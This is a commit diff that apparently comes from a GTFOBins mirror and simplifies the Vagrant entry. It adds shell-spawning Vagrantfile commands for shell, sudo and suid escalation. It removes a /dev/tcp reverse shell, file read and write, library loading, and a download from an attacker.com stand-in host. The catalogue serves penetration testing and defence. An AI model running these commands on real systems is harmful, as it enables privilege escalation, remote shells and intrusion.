mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Simplify vagrant
This commit is contained in:
parent
e05b154647
commit
f121dff1cc
@ -1,30 +1,20 @@
|
|||||||
---
|
---
|
||||||
description: |
|
description: This allows to execute [`ruby`](/gtfobins/ruby/) code, other functions may apply.
|
||||||
Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed.
|
|
||||||
More Info at https://gtfobins.github.io/gtfobins/ruby/
|
|
||||||
functions:
|
functions:
|
||||||
shell:
|
shell:
|
||||||
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up
|
- code: |
|
||||||
-
|
cd $(mktemp -d)
|
||||||
|
echo 'exec "/bin/sh"' > Vagrantfile
|
||||||
|
vagrant up
|
||||||
sudo:
|
sudo:
|
||||||
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up
|
- code: |
|
||||||
reverse-shell:
|
cd $(mktemp -d)
|
||||||
- description: |
|
echo 'exec "/bin/sh"' > Vagrantfile
|
||||||
Run `nc -lvnp RPORT` on the attacker box.
|
vagrant up
|
||||||
Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell.
|
suid:
|
||||||
code: |
|
- code: |
|
||||||
mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up
|
cd $(mktemp -d)
|
||||||
file-write:
|
echo 'exec "/bin/sh -p"' > Vagrantfile
|
||||||
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up
|
vagrant up
|
||||||
file-read:
|
|
||||||
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up
|
|
||||||
library-load:
|
|
||||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
|
||||||
file-download:
|
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
|
||||||
code: |
|
|
||||||
export URL=http://attacker.com/file_to_get
|
|
||||||
export LFILE=file_to_save
|
|
||||||
mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up
|
|
||||||
---
|
---
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user